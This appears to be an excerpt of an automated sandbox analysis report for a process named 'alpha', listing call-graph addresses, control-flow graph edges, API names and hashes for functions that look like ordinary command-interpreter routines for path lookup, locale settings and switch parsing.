7ff7cd4a906e 22248->22250 22252 7ff7cd48cd90 166 API calls 22249->22252 22251 7ff7cd49498c 8 API calls 22250->22251 22257 7ff7cd4a9081 22251->22257 22253 7ff7cd4a909b 22252->22253 22254 7ff7cd49498c 8 API calls 22253->22254 22253->22257 22255 7ff7cd4a90ec 22254->22255 22256 7ff7cd48ff70 2 API calls 22255->22256 22256->22257 22257->22175 22259 7ff7cd49ed0a DeleteProcThreadAttributeList 22258->22259 22259->22168 22262 7ff7cd49203b 22260->22262 22261 7ff7cd4920b0 22264 7ff7cd493060 171 API calls 22261->22264 22265 7ff7cd49211c 22261->22265 22262->22261 22263 7ff7cd492094 22262->22263 22266 7ff7cd4920a6 22263->22266 22267 7ff7cd483278 166 API calls 22263->22267 22264->22265 22265->22266 22268 7ff7cd492e44 2 API calls 22265->22268 22269 7ff7cd498f80 7 API calls 22266->22269 22267->22266 22271 7ff7cd492148 22268->22271 22270 7ff7cd492325 22269->22270 22270->22242 22271->22266 22272 7ff7cd492d70 3 API calls 22271->22272 22273 7ff7cd4921af 22272->22273 22274 7ff7cd48b900 166 API calls 22273->22274 22276 7ff7cd4921d0 22274->22276 22275 7ff7cd49e04a ??_V@YAXPEAX 22275->22266 22276->22275 22277 7ff7cd4922a4 ??_V@YAXPEAX 22276->22277 22278 7ff7cd49221c wcsspn 22276->22278 22277->22266 22280 7ff7cd48b900 166 API calls 22278->22280 22281 7ff7cd49223b 22280->22281 22281->22275 22284 7ff7cd492252 22281->22284 22282 7ff7cd49228f 22283 7ff7cd48d3f0 223 API calls 22282->22283 22283->22277 22284->22282 22285 7ff7cd49e06d wcschr 22284->22285 22286 7ff7cd49e090 towupper 22284->22286 22285->22284 22286->22282 22286->22284 22288 7ff7cd48d0f8 22287->22288 22307 7ff7cd48ce5b 22287->22307 22289 7ff7cd498f80 7 API calls 22288->22289 22291 7ff7cd48d10a 22289->22291 22290 7ff7cd49c860 22292 7ff7cd49c97c 22290->22292 22294 7ff7cd4aee88 390 API calls 22290->22294 22291->22242 22295 7ff7cd4ae9b4 197 API calls 22292->22295 22293 7ff7cd490494 182 API calls 22293->22307 22296 7ff7cd49c879 22294->22296 22297 7ff7cd49c981 longjmp 22295->22297 22298 7ff7cd49c882 EnterCriticalSection LeaveCriticalSection 22296->22298 22299 7ff7cd49c95c 22296->22299 22300 7ff7cd49c99a 22297->22300 22313 7ff7cd48d0e3 22298->22313 22299->22292 22303 7ff7cd4896b4 186 API calls 22299->22303 22300->22288 22302 7ff7cd49c9b3 ??_V@YAXPEAX 22300->22302 22302->22288 22303->22299 22304 7ff7cd48ceaa _tell 22306 7ff7cd48d208 _close 22304->22306 22305 7ff7cd48cd90 166 API calls 22305->22307 22306->22307 22307->22288 22307->22290 22307->22293 22307->22300 22307->22305 22308 7ff7cd49c9d5 22307->22308 22310 7ff7cd48b900 166 API calls 22307->22310 22307->22313 22317 7ff7cd48cf33 memset 22307->22317 22320 7ff7cd48ca40 17 API calls 22307->22320 22321 7ff7cd4abfec 176 API calls 22307->22321 22322 7ff7cd48d184 wcschr 22307->22322 22323 7ff7cd48d1a7 wcschr 22307->22323 22324 7ff7cd49c9c9 22307->22324 22326 7ff7cd4a778c 166 API calls 22307->22326 22327 7ff7cd490a6c 273 API calls 22307->22327 22328 7ff7cd48be00 635 API calls 22307->22328 22329 7ff7cd493448 166 API calls 22307->22329 22330 7ff7cd48cfab _wcsicmp 22307->22330 22331 7ff7cd490580 12 API calls 22307->22331 22335 7ff7cd491fac 238 API calls 22307->22335 22336 7ff7cd48d044 ??_V@YAXPEAX 22307->22336 22349 7ff7cd48df60 22307->22349 22369 7ff7cd4ac738 22307->22369 22309 7ff7cd4ad610 167 API calls 22308->22309 22311 7ff7cd49c9da 22309->22311 22310->22307 22312 7ff7cd49ca07 22311->22312 22315 7ff7cd4abfec 176 API calls 22311->22315 22314 7ff7cd4ae91c 198 API calls 22312->22314 22313->22242 22319 7ff7cd49ca0c 22314->22319 22316 7ff7cd49c9f1 22315->22316 22318 7ff7cd483240 166 API calls 22316->22318 22317->22307 22318->22312 22319->22242 22320->22307 22321->22307 22322->22307 22323->22307 22325 7ff7cd49855c ??_V@YAXPEAX 22324->22325 22325->22288 22326->22307 22327->22307 22328->22307 22329->22307 22330->22307 22332 7ff7cd48d003 GetConsoleOutputCP GetCPInfo 22331->22332 22333 7ff7cd4904f4 3 API calls 22332->22333 22333->22307 22335->22307 22336->22307 22338 7ff7cd49596c 22337->22338 22342 7ff7cd495a12 22337->22342 22339 7ff7cd49598d VirtualQuery 22338->22339 22338->22342 22340 7ff7cd4959ad 22339->22340 22339->22342 22341 7ff7cd4959b7 VirtualQuery 22340->22341 22340->22342 22341->22340 22341->22342 22342->22242 22347 7ff7cd4a76a3 22343->22347 22344 7ff7cd4a76b7 22346 7ff7cd4ae9b4 197 API calls 22344->22346 22345 7ff7cd4896b4 186 API calls 22345->22347 22348 7ff7cd4a76bc longjmp 22346->22348 22347->22344 22347->22345 22350 7ff7cd48dfe2 22349->22350 22351 7ff7cd48df93 22349->22351 22353 7ff7cd48e100 VirtualFree 22350->22353 22354 7ff7cd48e00b _setjmp 22350->22354 22351->22350 22352 7ff7cd48df9f GetProcessHeap RtlFreeHeap 22351->22352 22352->22350 22352->22351 22353->22350 22355 7ff7cd48e04a 22354->22355 22363 7ff7cd48e0c3 22354->22363 22356 7ff7cd48e600 473 API calls 22355->22356 22357 7ff7cd48e073 22356->22357 22358 7ff7cd48e0e0 longjmp 22357->22358 22359 7ff7cd48e081 22357->22359 22361 7ff7cd48e0b0 22358->22361 22360 7ff7cd48d250 475 API calls 22359->22360 22362 7ff7cd48e086 22360->22362 22361->22363 22379 7ff7cd4ad3fc 22361->22379 22362->22361 22366 7ff7cd48e600 473 API calls 22362->22366 22363->22304 22367 7ff7cd48e0a7 22366->22367 22367->22361 22368 7ff7cd4ad610 167 API calls 22367->22368 22368->22361 22370 7ff7cd4ac775 22369->22370 22377 7ff7cd4ac7ab 22369->22377 22371 7ff7cd48cd90 166 API calls 22370->22371 22373 7ff7cd4ac781 22371->22373 22372 7ff7cd4ac8d4 22372->22307 22373->22372 22374 7ff7cd48b0d8 194 API calls 22373->22374 22374->22372 22375 7ff7cd48b6b0 170 API calls 22375->22377 22376 7ff7cd48b038 _dup2 22376->22377 22377->22372 22377->22373 22377->22375 22377->22376 22378 7ff7cd48d208 _close 22377->22378 22378->22377 22395 7ff7cd4ad419 22379->22395 22380 7ff7cd49cadf 22381 7ff7cd4ad592 22383 7ff7cd493448 166 API calls 22381->22383 22382 7ff7cd4ad5c4 22385 7ff7cd493448 166 API calls 22382->22385 22384 7ff7cd4ad5a5 22383->22384 22387 7ff7cd4ad5ba 22384->22387 22390 7ff7cd493448 166 API calls 22384->22390 22385->22380 22397 7ff7cd4ad36c 22387->22397 22388 7ff7cd493448 166 API calls 22388->22395 22389 7ff7cd4ad546 22389->22382 22392 7ff7cd4ad555 22389->22392 22390->22387 22404 7ff7cd4ad31c 22392->22404 22393 7ff7cd4ad541 22393->22381 22393->22382 22393->22389 22394 7ff7cd4ad589 22393->22394 22394->22381 22394->22392 22395->22380 22395->22381 22395->22382 22395->22388 22395->22392 22395->22393 22396 7ff7cd4ad3fc 166 API calls 22395->22396 22396->22395 22398 7ff7cd4ad381 22397->22398 22399 7ff7cd4ad3d8 22397->22399 22400 7ff7cd4934a0 166 API calls 22398->22400 22402 7ff7cd4ad390 22400->22402 22401 7ff7cd493448 166 API calls 22401->22402 22402->22399 22402->22401 22403 7ff7cd4934a0 166 API calls 22402->22403 22403->22402 22405 7ff7cd493448 166 API calls 22404->22405 22406 7ff7cd4ad33b 22405->22406 22407 7ff7cd4ad36c 166 API calls 22406->22407 22408 7ff7cd4ad343 22407->22408 22409 7ff7cd4ad3fc 166 API calls 22408->22409 22426 7ff7cd4ad34e 22409->22426 22410 7ff7cd4ad592 22412 7ff7cd493448 166 API calls 22410->22412 22411 7ff7cd4ad5c4 22415 7ff7cd493448 166 API calls 22411->22415 22413 7ff7cd4ad5a5 22412->22413 22417 7ff7cd4ad5ba 22413->22417 22420 7ff7cd493448 166 API calls 22413->22420 22414 7ff7cd493448 166 API calls 22414->22426 22419 7ff7cd4ad5c2 22415->22419 22416 7ff7cd4ad31c 166 API calls 22416->22419 22421 7ff7cd4ad36c 166 API calls 22417->22421 22418 7ff7cd4ad546 22418->22411 22422 7ff7cd4ad555 22418->22422 22419->22380 22420->22417 22421->22419 22422->22416 22423 7ff7cd4ad541 22423->22410 22423->22411 22423->22418 22424 7ff7cd4ad589 22423->22424 22424->22410 22424->22422 22425 7ff7cd4ad3fc 166 API calls 22425->22426 22426->22410 22426->22411 22426->22414 22426->22419 22426->22422 22426->22423 22426->22425 22428 7ff7cd48c486 22427->22428 22429 7ff7cd48c4c9 22427->22429 22430 7ff7cd48c48e wcschr 22428->22430 22434 7ff7cd48c161 22428->22434 22432 7ff7cd48ff70 2 API calls 22429->22432 22429->22434 22431 7ff7cd48c4ef 22430->22431 22430->22434 22433 7ff7cd48cd90 166 API calls 22431->22433 22432->22434 22435 7ff7cd48c4f9 22433->22435 22434->22045 22434->22065 22435->22434 22436 7ff7cd48c5bd 22435->22436 22438 7ff7cd48d840 178 API calls 22435->22438 22440 7ff7cd48c541 22435->22440 22437 7ff7cd48b6b0 170 API calls 22436->22437 22436->22440 22437->22440 22438->22435 22439 7ff7cd48ff70 2 API calls 22439->22434 22440->22434 22440->22439 22442 7ff7cd48b018 22441->22442 22442->22110 22443->22110 22445 7ff7cd4a4621 22444->22445 22448 7ff7cd4872de 22444->22448 22447 7ff7cd4a447b longjmp 22445->22447 22453 7ff7cd4a4639 22445->22453 22468 7ff7cd4a475e 22445->22468 22471 7ff7cd4a47e0 22445->22471 22446 7ff7cd4872eb 22505 7ff7cd487348 22446->22505 22454 7ff7cd4a4492 22447->22454 22448->22446 22451 7ff7cd4a4530 22448->22451 22452 7ff7cd4a4467 22448->22452 22449 7ff7cd487348 168 API calls 22455 7ff7cd4a4524 22449->22455 22461 7ff7cd487348 168 API calls 22451->22461 22452->22446 22452->22454 22466 7ff7cd4a4475 22452->22466 22458 7ff7cd4a4695 22453->22458 22459 7ff7cd4a463e 22453->22459 22460 7ff7cd487348 168 API calls 22454->22460 22462 7ff7cd4872b0 168 API calls 22455->22462 22470 7ff7cd487323 22455->22470 22457 7ff7cd487315 22520 7ff7cd4873d4 22457->22520 22465 7ff7cd4873d4 168 API calls 22458->22465 22459->22447 22472 7ff7cd4a4654 22459->22472 22478 7ff7cd4a44a8 22460->22478 22479 7ff7cd4a4549 22461->22479 22469 7ff7cd4a480e 22462->22469 22463 7ff7cd487348 168 API calls 22463->22457 22483 7ff7cd4a469a 22465->22483 22466->22447 22466->22458 22467 7ff7cd487348 168 API calls 22467->22471 22468->22467 22469->22140 22470->22140 22471->22449 22480 7ff7cd487348 168 API calls 22472->22480 22473 7ff7cd4a45b2 22475 7ff7cd487348 168 API calls 22473->22475 22474 7ff7cd4a46e1 22481 7ff7cd4872b0 168 API calls 22474->22481 22482 7ff7cd4a45c7 22475->22482 22476 7ff7cd4a455e 22476->22473 22484 7ff7cd487348 168 API calls 22476->22484 22477 7ff7cd4a44e2 22487 7ff7cd4872b0 168 API calls 22477->22487 22478->22477 22486 7ff7cd487348 168 API calls 22478->22486 22479->22473 22479->22476 22492 7ff7cd487348 168 API calls 22479->22492 22480->22470 22488 7ff7cd4a4738 22481->22488 22485 7ff7cd487348 168 API calls 22482->22485 22483->22474 22497 7ff7cd4a46c7 22483->22497 22498 7ff7cd4a46ea 22483->22498 22484->22473 22491 7ff7cd4a45db 22485->22491 22486->22477 22489 7ff7cd4a44f1 22487->22489 22490 7ff7cd487348 168 API calls 22488->22490 22494 7ff7cd4872b0 168 API calls 22489->22494 22490->22455 22493 7ff7cd487348 168 API calls 22491->22493 22492->22476 22495 7ff7cd4a45ec 22493->22495 22496 7ff7cd4a4503 22494->22496 22500 7ff7cd487348 168 API calls 22495->22500 22496->22470 22502 7ff7cd487348 168 API calls 22496->22502 22497->22474 22503 7ff7cd487348 168 API calls 22497->22503 22499 7ff7cd487348 168 API calls 22498->22499 22499->22474 22501 7ff7cd4a4600 22500->22501 22504 7ff7cd487348 168 API calls 22501->22504 22502->22455 22503->22474 22504->22455 22512 7ff7cd48735d 22505->22512 22506 7ff7cd483278 166 API calls 22507 7ff7cd4a4820 longjmp 22506->22507 22508 7ff7cd4a4838 22507->22508 22509 7ff7cd483278 166 API calls 22508->22509 22510 7ff7cd4a4844 longjmp 22509->22510 22511 7ff7cd4a485a 22510->22511 22513 7ff7cd487348 166 API calls 22511->22513 22512->22506 22512->22508 22512->22512 22519 7ff7cd4873ab 22512->22519 22514 7ff7cd4a487b 22513->22514 22515 7ff7cd487348 166 API calls 22514->22515 22516 7ff7cd4a48ad 22515->22516 22517 7ff7cd487348 166 API calls 22516->22517 22518 7ff7cd4872ff 22517->22518 22518->22457 22518->22463 22521 7ff7cd487401 22520->22521 22521->22470 22522 7ff7cd487348 168 API calls 22521->22522 22523 7ff7cd4a487b 22522->22523 22524 7ff7cd487348 168 API calls 22523->22524 22525 7ff7cd4a48ad 22524->22525 22526 7ff7cd487348 168 API calls 22525->22526 22527 7ff7cd4a48be 22526->22527 22527->22470

                                        Executed Functions

                                        Function 00007FF7CD490A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                        • API String ID: 3305344409-4288247545
                                        • Opcode ID: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                        • Instruction ID: f59f466bf3d194420bf07580d70786908cb9e20fd8e180badbe2ab844d814d04
                                        • Opcode Fuzzy Hash: 3a658cc38ab97f116ce8e8e87b4ee7862caa448d1090e4e356381fbb7e19e6af
                                        • Instruction Fuzzy Hash: 3C42D821B0CA8285EB60BF1298446B9A7A6AF857B5FC44135DF2E477D4FF3CE6458320
                                        Function 00007FF7CD48AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 216 7ff7cd48aa54-7ff7cd48aa98 call 7ff7cd48cd90 219 7ff7cd49bf5a-7ff7cd49bf70 call 7ff7cd494c1c call 7ff7cd48ff70 216->219 220 7ff7cd48aa9e 216->220 221 7ff7cd48aaa5-7ff7cd48aaa8 220->221 223 7ff7cd48acde-7ff7cd48ad00 221->223 224 7ff7cd48aaae-7ff7cd48aac8 wcschr 221->224 230 7ff7cd48ad06 223->230 224->223 227 7ff7cd48aace-7ff7cd48aae9 towlower 224->227 227->223 229 7ff7cd48aaef-7ff7cd48aaf3 227->229 233 7ff7cd49beb7-7ff7cd49bec4 call 7ff7cd4aeaf0 229->233 234 7ff7cd48aaf9-7ff7cd48aafd 229->234 231 7ff7cd48ad0d-7ff7cd48ad1f 230->231 237 7ff7cd48ad22-7ff7cd48ad2a call 7ff7cd4913e0 231->237 246 7ff7cd49bf43-7ff7cd49bf59 call 7ff7cd494c1c 233->246 247 7ff7cd49bec6-7ff7cd49bed8 call 7ff7cd483240 233->247 235 7ff7cd49bbcf 234->235 236 7ff7cd48ab03-7ff7cd48ab07 234->236 249 7ff7cd49bbde 235->249 239 7ff7cd48ab09-7ff7cd48ab0d 236->239 240 7ff7cd48ab7d-7ff7cd48ab81 236->240 237->221 243 7ff7cd48ab13-7ff7cd48ab17 239->243 244 7ff7cd49be63 239->244 240->244 248 7ff7cd48ab87-7ff7cd48ab95 240->248 243->240 250 7ff7cd48ab19-7ff7cd48ab1d 243->250 255 7ff7cd49be72-7ff7cd49be88 call 7ff7cd483278 call 7ff7cd494c1c 244->255 246->219 247->246 263 7ff7cd49beda-7ff7cd49bee9 call 7ff7cd483240 247->263 253 7ff7cd48ab98-7ff7cd48aba0 248->253 259 7ff7cd49bbea-7ff7cd49bbec 249->259 250->249 254 7ff7cd48ab23-7ff7cd48ab27 250->254 253->253 258 7ff7cd48aba2-7ff7cd48abb3 call 7ff7cd48cd90 253->258 254->259 261 7ff7cd48ab2d-7ff7cd48ab31 254->261 283 7ff7cd49be89-7ff7cd49be8c 255->283 258->219 269 7ff7cd48abb9-7ff7cd48abde call 7ff7cd4913e0 call 7ff7cd4933a8 258->269 265 7ff7cd49bbf8-7ff7cd49bc01 259->265 261->230 266 7ff7cd48ab37-7ff7cd48ab3b 261->266 277 7ff7cd49bef3-7ff7cd49bef9 263->277 278 7ff7cd49beeb-7ff7cd49bef1 263->278 265->231 266->265 270 7ff7cd48ab41-7ff7cd48ab45 266->270 305 7ff7cd48abe4-7ff7cd48abe7 269->305 306 7ff7cd48ac75 269->306 274 7ff7cd49bc06-7ff7cd49bc2a call 7ff7cd4913e0 270->274 275 7ff7cd48ab4b-7ff7cd48ab4f 270->275 294 7ff7cd49bc5a-7ff7cd49bc61 274->294 295 7ff7cd49bc2c-7ff7cd49bc4c _wcsnicmp 274->295 281 7ff7cd48ad2f-7ff7cd48ad33 275->281 282 7ff7cd48ab55-7ff7cd48ab78 call 7ff7cd4913e0 275->282 277->246 284 7ff7cd49befb-7ff7cd49bf0d call 7ff7cd483240 277->284 278->246 278->277 288 7ff7cd49bc66-7ff7cd49bc8a call 7ff7cd4913e0 281->288 289 7ff7cd48ad39-7ff7cd48ad3d 281->289 282->221 291 7ff7cd49be92-7ff7cd49beaa call 7ff7cd483278 call 7ff7cd494c1c 283->291 292 7ff7cd48acbe 283->292 284->246 303 7ff7cd49bf0f-7ff7cd49bf21 call 7ff7cd483240 284->303 324 7ff7cd49bcc4-7ff7cd49bcdc 288->324 325 7ff7cd49bc8c-7ff7cd49bcaa _wcsnicmp 288->325 297 7ff7cd48ad43-7ff7cd48ad49 289->297 298 7ff7cd49bcde-7ff7cd49bd02 call 7ff7cd4913e0 289->298 337 7ff7cd49beab-7ff7cd49beb6 call 7ff7cd494c1c 291->337 301 7ff7cd48acc0-7ff7cd48acc7 292->301 309 7ff7cd49bd31-7ff7cd49bd4f _wcsnicmp 294->309 295->294 304 7ff7cd49bc4e-7ff7cd49bc55 295->304 307 7ff7cd48ad4f-7ff7cd48ad68 297->307 308 7ff7cd49bd5e-7ff7cd49bd65 297->308 331 7ff7cd49bd04-7ff7cd49bd24 _wcsnicmp 298->331 332 7ff7cd49bd2a 298->332 301->301 311 7ff7cd48acc9-7ff7cd48acda 301->311 303->246 339 7ff7cd49bf23-7ff7cd49bf35 call 7ff7cd483240 303->339 319 7ff7cd49bbb3-7ff7cd49bbb7 304->319 305->292 321 7ff7cd48abed-7ff7cd48ac0b call 7ff7cd48cd90 * 2 305->321 316 7ff7cd48ac77-7ff7cd48ac7f 306->316 322 7ff7cd48ad6a 307->322 323 7ff7cd48ad6d-7ff7cd48ad70 307->323 308->307 320 7ff7cd49bd6b-7ff7cd49bd73 308->320 317 7ff7cd49bbc2-7ff7cd49bbca 309->317 318 7ff7cd49bd55 309->318 311->223 316->292 328 7ff7cd48ac81-7ff7cd48ac85 316->328 317->221 318->308 333 7ff7cd49bbba-7ff7cd49bbbd call 7ff7cd4913e0 319->333 334 7ff7cd49be4a-7ff7cd49be5e 320->334 335 7ff7cd49bd79-7ff7cd49bd8b iswxdigit 320->335 321->337 358 7ff7cd48ac11-7ff7cd48ac14 321->358 322->323 323->237 324->309 325->324 329 7ff7cd49bcac-7ff7cd49bcbf 325->329 340 7ff7cd48ac88-7ff7cd48ac8f 328->340 329->319 331->332 338 7ff7cd49bbac 331->338 332->309 333->317 334->333 335->334 342 7ff7cd49bd91-7ff7cd49bda3 iswxdigit 335->342 337->233 338->319 339->246 354 7ff7cd49bf37-7ff7cd49bf3e call 7ff7cd483240 339->354 340->340 345 7ff7cd48ac91-7ff7cd48ac94 340->345 342->334 347 7ff7cd49bda9-7ff7cd49bdbb iswxdigit 342->347 345->292 351 7ff7cd48ac96-7ff7cd48acaa wcsrchr 345->351 347->334 352 7ff7cd49bdc1-7ff7cd49bdd7 iswdigit 347->352 351->292 355 7ff7cd48acac-7ff7cd48acb9 call 7ff7cd491300 351->355 356 7ff7cd49bddf-7ff7cd49bdeb towlower 352->356 357 7ff7cd49bdd9-7ff7cd49bddd 352->357 354->246 355->292 361 7ff7cd49bdee-7ff7cd49be0f iswdigit 356->361 357->361 358->337 362 7ff7cd48ac1a-7ff7cd48ac33 memset 358->362 363 7ff7cd49be11-7ff7cd49be15 361->363 364 7ff7cd49be17-7ff7cd49be23 towlower 361->364 362->306 365 7ff7cd48ac35-7ff7cd48ac4b wcschr 362->365 366 7ff7cd49be26-7ff7cd49be45 call 7ff7cd4913e0 363->366 364->366 365->306 367 7ff7cd48ac4d-7ff7cd48ac54 365->367 366->334 368 7ff7cd48ad72-7ff7cd48ad91 wcschr 367->368 369 7ff7cd48ac5a-7ff7cd48ac6f wcschr 367->369 371 7ff7cd48af03-7ff7cd48af07 368->371 372 7ff7cd48ad97-7ff7cd48adac wcschr 368->372 369->306 369->368 371->306 372->371 373 7ff7cd48adb2-7ff7cd48adc7 wcschr 372->373 373->371 374 7ff7cd48adcd-7ff7cd48ade2 wcschr 373->374 374->371 375 7ff7cd48ade8-7ff7cd48adfd wcschr 374->375 375->371 376 7ff7cd48ae03-7ff7cd48ae18 wcschr 375->376 376->371 377 7ff7cd48ae1e-7ff7cd48ae21 376->377 378 7ff7cd48ae24-7ff7cd48ae27 377->378 378->371 379 7ff7cd48ae2d-7ff7cd48ae40 iswspace 378->379 380 7ff7cd48ae42-7ff7cd48ae49 379->380 381 7ff7cd48ae4b-7ff7cd48ae5e 379->381 380->378 382 7ff7cd48ae66-7ff7cd48ae6d 381->382 382->382 383 7ff7cd48ae6f-7ff7cd48ae77 382->383 383->255 384 7ff7cd48ae7d-7ff7cd48ae97 call 7ff7cd4913e0 383->384 387 7ff7cd48ae9a-7ff7cd48aea4 384->387 388 7ff7cd48aea6-7ff7cd48aead 387->388 389 7ff7cd48aebc-7ff7cd48aef8 call 7ff7cd490a6c call 7ff7cd48ff70 * 2 387->389 388->389 390 7ff7cd48aeaf-7ff7cd48aeba 388->390 389->316 397 7ff7cd48aefe 389->397 390->387 390->389 397->283
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                        • String ID: :$:$:$:ON$OFF
                                        • API String ID: 972821348-467788257
                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction ID: 0d22c9a4b0c31640e32dad20064c3190ec93bd06ff7c4d8b9a73e75567398a24
                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction Fuzzy Hash: 2522C421B0C74286EB54BF629854278E696EF54BA0FC88035CF2E87795FF7CA644C720
                                        Function 00007FF7CD4951EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ff7cd4951ec-7ff7cd495248 call 7ff7cd495508 GetLocaleInfoW 401 7ff7cd49ef32-7ff7cd49ef3c 398->401 402 7ff7cd49524e-7ff7cd495272 GetLocaleInfoW 398->402 405 7ff7cd49ef3f-7ff7cd49ef49 401->405 403 7ff7cd495274-7ff7cd49527a 402->403 404 7ff7cd495295-7ff7cd4952b9 GetLocaleInfoW 402->404 406 7ff7cd495280-7ff7cd495286 403->406 407 7ff7cd4954f7-7ff7cd4954f9 403->407 408 7ff7cd4952bb-7ff7cd4952c3 404->408 409 7ff7cd4952de-7ff7cd495305 GetLocaleInfoW 404->409 410 7ff7cd49ef61-7ff7cd49ef6c 405->410 411 7ff7cd49ef4b-7ff7cd49ef52 405->411 406->407 412 7ff7cd49528c-7ff7cd49528f 406->412 407->401 413 7ff7cd49ef75-7ff7cd49ef78 408->413 414 7ff7cd4952c9-7ff7cd4952d7 408->414 415 7ff7cd495321-7ff7cd495343 GetLocaleInfoW 409->415 416 7ff7cd495307-7ff7cd49531b 409->416 410->413 411->410 417 7ff7cd49ef54-7ff7cd49ef5f 411->417 412->404 420 7ff7cd49ef7a-7ff7cd49ef7d 413->420 421 7ff7cd49ef99-7ff7cd49efa3 413->421 414->409 418 7ff7cd49efaf-7ff7cd49efb9 415->418 419 7ff7cd495349-7ff7cd49536e GetLocaleInfoW 415->419 416->415 417->405 417->410 422 7ff7cd49efbc-7ff7cd49efc6 418->422 423 7ff7cd49eff2-7ff7cd49effc 419->423 424 7ff7cd495374-7ff7cd495396 GetLocaleInfoW 419->424 420->409 425 7ff7cd49ef83-7ff7cd49ef8d 420->425 421->418 426 7ff7cd49efc8-7ff7cd49efcf 422->426 427 7ff7cd49efde-7ff7cd49efe9 422->427 428 7ff7cd49efff-7ff7cd49f009 423->428 429 7ff7cd49f035-7ff7cd49f03f 424->429 430 7ff7cd49539c-7ff7cd4953be GetLocaleInfoW 424->430 425->421 426->427 432 7ff7cd49efd1-7ff7cd49efdc 426->432 427->423 433 7ff7cd49f021-7ff7cd49f02c 428->433 434 7ff7cd49f00b-7ff7cd49f012 428->434 431 7ff7cd49f042-7ff7cd49f04c 429->431 435 7ff7cd4953c4-7ff7cd4953e6 GetLocaleInfoW 430->435 436 7ff7cd49f078-7ff7cd49f082 430->436 437 7ff7cd49f064-7ff7cd49f06f 431->437 438 7ff7cd49f04e-7ff7cd49f055 431->438 432->422 432->427 433->429 434->433 440 7ff7cd49f014-7ff7cd49f01f 434->440 441 7ff7cd49f0bb-7ff7cd49f0c5 435->441 442 7ff7cd4953ec-7ff7cd49540e GetLocaleInfoW 435->442 439 7ff7cd49f085-7ff7cd49f08f 436->439 437->436 438->437 443 7ff7cd49f057-7ff7cd49f062 438->443 444 7ff7cd49f091-7ff7cd49f098 439->444 445 7ff7cd49f0a7-7ff7cd49f0b2 439->445 440->428 440->433 446 7ff7cd49f0c8-7ff7cd49f0d2 441->446 447 7ff7cd495414-7ff7cd495436 GetLocaleInfoW 442->447 448 7ff7cd49f0fe-7ff7cd49f108 442->448 443->431 443->437 444->445 450 7ff7cd49f09a-7ff7cd49f0a5 444->450 445->441 451 7ff7cd49f0d4-7ff7cd49f0db 446->451 452 7ff7cd49f0ea-7ff7cd49f0f5 446->452 453 7ff7cd49f141-7ff7cd49f14b 447->453 454 7ff7cd49543c-7ff7cd49545e GetLocaleInfoW 447->454 449 7ff7cd49f10b-7ff7cd49f115 448->449 457 7ff7cd49f117-7ff7cd49f11e 449->457 458 7ff7cd49f12d-7ff7cd49f138 449->458 450->439 450->445 451->452 460 7ff7cd49f0dd-7ff7cd49f0e8 451->460 452->448 459 7ff7cd49f14e-7ff7cd49f158 453->459 455 7ff7cd49f184-7ff7cd49f18b 454->455 456 7ff7cd495464-7ff7cd495486 GetLocaleInfoW 454->456 466 7ff7cd49f18e-7ff7cd49f198 455->466 461 7ff7cd49f1c4-7ff7cd49f1ce 456->461 462 7ff7cd49548c-7ff7cd4954ae GetLocaleInfoW 456->462 457->458 463 7ff7cd49f120-7ff7cd49f12b 457->463 458->453 464 7ff7cd49f170-7ff7cd49f17b 459->464 465 7ff7cd49f15a-7ff7cd49f161 459->465 